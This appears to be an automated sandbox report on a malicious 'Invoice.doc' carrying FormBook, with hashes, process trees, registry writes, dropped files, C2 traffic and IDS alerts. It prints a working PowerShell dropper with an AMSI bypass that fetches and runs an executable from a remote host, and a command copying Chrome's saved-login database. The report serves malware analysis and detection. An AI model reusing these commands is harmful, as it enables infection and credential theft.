File name: | Invoice.doc |
Full analysis: | https://app.any.run/tasks/27b55ddc-fe30-4d11-942d-220e4e3f9605 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | January 11, 2019, 12:25:53 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Title: y8883, Subject: ua241e, Keywords: The transformative moment in Rumis life came in 1244, when he met a wandering mystic known as Shams of Tabriz. umi was 37, a traditional Muslim preacher and scholar, as his father and grandfather had been, says Gooch.c friendship for three years lover and The two of them have this electri beloved [or] disciple and sheikh, its never clear., Comments: Home,News,Sport,Weather,Shop,Reel,Travel,Capital,Culture,Future,Sounds,CBBC,CBeebies,Food,Bitesize,Arts,Make It Digital,Taster,Nature,L, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Jan 10 08:05:00 2019, Last Saved Time/Date: Thu Jan 10 08:05:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0 |
MD5: | 037F9E66DD3B71F4B8FC3A3A52A90C20 |
SHA1: | 0E516072BA747B5F6917971E521F172C18FD5CAC |
SHA256: | 7715FD65B7A1AFF18214C55C62BF362BC18A4719F20E62D83566DD05CBBF786B |
SSDEEP: | 384:y8iS8px8SMDO3ENGONQS5Bksdgv38AzmaMOYN0j1otf:a3yEENGO7yZ7MlC |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | y8883 |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | - |
Paragraphs: | - |
Lines: | - |
Bytes: | 11000 |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | - |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:01:10 08:05:00 |
CreateDate: | 2019:01:10 08:05:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | Home,News,Sport,Weather,Shop,Reel,Travel,Capital,Culture,Future,Sounds,CBBC,CBeebies,Food,Bitesize,Arts,Make It Digital,Taster,Nature,L |
Keywords: | The transformative moment in Rumi’s life came in 1244, when he met a wandering mystic known as Shams of Tabriz. umi was 37, a traditional Muslim preacher and scholar, as his father and grandfather had been,” says Gooch.c friendship for three years – lover and The two of them have this electri beloved [or] disciple and sheikh, it’s never clear. |
Author: | - |
Subject: | ua241e |
Title: | y8883 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2924 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 Modules
| |||||||||||||||
3932 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);If (test-path $env:APPDATA + '\okyp.exe') {Remove-Item $env:APPDATA + '\okyp.exe'}; $ZLCTZ = New-Object System.Net.WebClient; $ZLCTZ.Headers['User-Agent'] = 'ZLCTZ'; $ZLCTZ.DownloadFile('http://supportwip.com/sweetmoney/sureboy.exe', $env:APPDATA + '\okyp.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\okyp.exe'); Stop-Process -Id $Pid -Force | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 4294967295 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3580 | "C:\Users\admin\AppData\Roaming\okyp.exe" | C:\Users\admin\AppData\Roaming\okyp.exe | — | powershell.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
3232 | "C:\Windows\System32\systray.exe" | C:\Windows\System32\systray.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Systray .exe stub Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3028 | /c del "C:\Users\admin\AppData\Roaming\okyp.exe" | C:\Windows\System32\cmd.exe | — | systray.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
116 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3116 | "C:\Program Files\Mozilla Firefox\Firefox.exe" | C:\Program Files\Mozilla Firefox\Firefox.exe | systray.exe | ||||||||||||
User: admin Company: Mozilla Corporation Integrity Level: MEDIUM Description: Firefox Exit code: 0 Version: 61.0.2 Modules
| |||||||||||||||
3168 | /c copy "C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\admin\AppData\Local\Temp\DB1" /V | C:\Windows\System32\cmd.exe | systray.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
|
(PID) Process: | (2924) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | 7!% |
Value: 372125006C0B0000010000000000000000000000 | |||
(PID) Process: | (2924) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2924) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2924) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1311440926 | |||
(PID) Process: | (2924) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1311441040 | |||
(PID) Process: | (2924) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1311441041 | |||
(PID) Process: | (2924) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 6C0B0000FE8B30DBA8A9D40100000000 | |||
(PID) Process: | (2924) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | j#% |
Value: 6A2325006C0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2924) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | j#% |
Value: 6A2325006C0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2924) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2924 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9197.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7MVWRVUGPCJIH10UZQLU.temp | — | |
MD5:— | SHA256:— | |||
2924 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$nvoice.doc | pgc | |
MD5:4DEEDEE404389A721352098DF5F35B67 | SHA256:AC97D48C4EA5C347B68376711FF5676C55B328D740FC33416B84D838145F315D | |||
3232 | systray.exe | C:\Users\admin\AppData\Roaming\3Q2AQ-22\3Q2logrc.ini | binary | |
MD5:2855A82ECDD565B4D957EC2EE05AED26 | SHA256:88E38DA5B12DD96AFD9DC90C79929EC31D8604B1AFDEBDD5A02B19249C08C939 | |||
3932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3932 | powershell.exe | C:\Users\admin\AppData\Roaming\okyp.exe | executable | |
MD5:765DA31F20FE265BFAAD52A8B7783428 | SHA256:C2A178F24669726FB79E35B68E57F9511D10D616A9C3E27B359347A7442FB2C0 | |||
2924 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:41379A924454D4DBF21EC8153C20C10F | SHA256:0C15CF2B44D7D8698623838B4214E135CD0F5B33F8FE0D860DBE04AB98A65B80 | |||
3932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199d11.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3232 | systray.exe | C:\Users\admin\AppData\Roaming\3Q2AQ-22\3Q2logim.jpeg | image | |
MD5:B9B7820FC4B4A7688AF78A7C2F0BD2EA | SHA256:5F4608D8DF41D9D8EE46CC8B6D236D80B05FD290BB7059DE84B4AA557724A936 | |||
3116 | Firefox.exe | C:\Users\admin\AppData\Roaming\3Q2AQ-22\3Q2logrf.ini | binary | |
MD5:53028481B5B5795F1501241CCC7ABFF6 | SHA256:75B5F3045E20C80F264568707E2D444DC7498DB119D9661AE51A91575960FC5A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
116 | explorer.exe | GET | 301 | 91.197.229.178:80 | http://www.poludi.com/h338/?mz7xU=Mk4ZEShFqULTsaF0XK/8FqKcCk95UNLNJKoy7u5vPmnqz/wagv5VU4tRNIzD42mKcAUBWw==&Un0=9rj8zR5hUB7LxJ00&sql=1 | GB | — | — | malicious |
116 | explorer.exe | GET | — | 154.83.149.29:80 | http://www.57maiche.com/h338/?mz7xU=NV1+jEcSAdddK4garX8ku4se6CqspjOpSP+U2OFBm3+R7b+2CsRubuWy/znMrDf+FjB7Wg==&Un0=9rj8zR5hUB7LxJ00 | US | — | — | malicious |
116 | explorer.exe | GET | — | 93.89.226.17:80 | http://www.magnetaraba.com/h338/?mz7xU=BykNHXwYDJdeDgKR3FWbYQVNXcq2qTzZSeXXVh/qHFW68iISCy7e6kECzKi+UcA0jmuYMQ==&Un0=9rj8zR5hUB7LxJ00&sql=1 | CY | — | — | malicious |
116 | explorer.exe | GET | — | 104.217.42.167:80 | http://www.yncits60.com/h338/?mz7xU=LTBLM06XJVCFnl6kdmraniVJjDPmmd32bKvcr5K5R/32ggOyVf5i9AouFgef/a5XWJTCRg==&Un0=9rj8zR5hUB7LxJ00&sql=1 | US | — | — | malicious |
3932 | powershell.exe | GET | 200 | 91.234.99.161:80 | http://supportwip.com/sweetmoney/sureboy.exe | NL | executable | 167 Kb | malicious |
116 | explorer.exe | POST | — | 104.217.42.167:80 | http://www.yncits60.com/h338/ | US | — | — | malicious |
116 | explorer.exe | POST | — | 91.197.229.178:80 | http://www.poludi.com/h338/ | GB | — | — | malicious |
116 | explorer.exe | POST | — | 91.197.229.178:80 | http://www.poludi.com/h338/ | GB | — | — | malicious |
116 | explorer.exe | POST | — | 104.217.42.167:80 | http://www.yncits60.com/h338/ | US | — | — | malicious |
116 | explorer.exe | POST | — | 93.89.226.17:80 | http://www.magnetaraba.com/h338/ | CY | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
116 | explorer.exe | 154.83.149.29:80 | www.57maiche.com | MULTACOM CORPORATION | US | malicious |
116 | explorer.exe | 104.217.42.167:80 | www.yncits60.com | Psychz Networks | US | malicious |
3932 | powershell.exe | 91.234.99.161:80 | supportwip.com | MAROSNET Telecommunication Company LLC | NL | suspicious |
116 | explorer.exe | 91.197.229.178:80 | www.poludi.com | Gyron Internet Ltd | GB | malicious |
116 | explorer.exe | 80.237.133.41:80 | www.mynuesli.com | Host Europe GmbH | DE | malicious |
116 | explorer.exe | 66.147.244.214:80 | www.newtonjiujitsu.com | Unified Layer | US | malicious |
116 | explorer.exe | 93.89.226.17:80 | www.magnetaraba.com | Fbs Bilisim Cozumleri Tic Ltd Sti. | CY | malicious |
116 | explorer.exe | 192.64.115.93:80 | www.bonzaj.com | Namecheap, Inc. | US | malicious |
Domain | IP | Reputation |
---|---|---|
supportwip.com |
| malicious |
www.57maiche.com |
| malicious |
www.poludi.com |
| malicious |
www.magnetaraba.com |
| malicious |
www.sexeuw.info |
| unknown |
www.yncits60.com |
| malicious |
www.newtonjiujitsu.com |
| malicious |
www.bangdai898.com |
| unknown |
www.mynuesli.com |
| malicious |
www.bonzaj.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3932 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
116 | explorer.exe | A Network Trojan was detected | SC SPYWARE Trojan-Spy.Win32.Noon |
116 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
116 | explorer.exe | A Network Trojan was detected | SC SPYWARE Trojan-Spy.Win32.Noon |
116 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
116 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |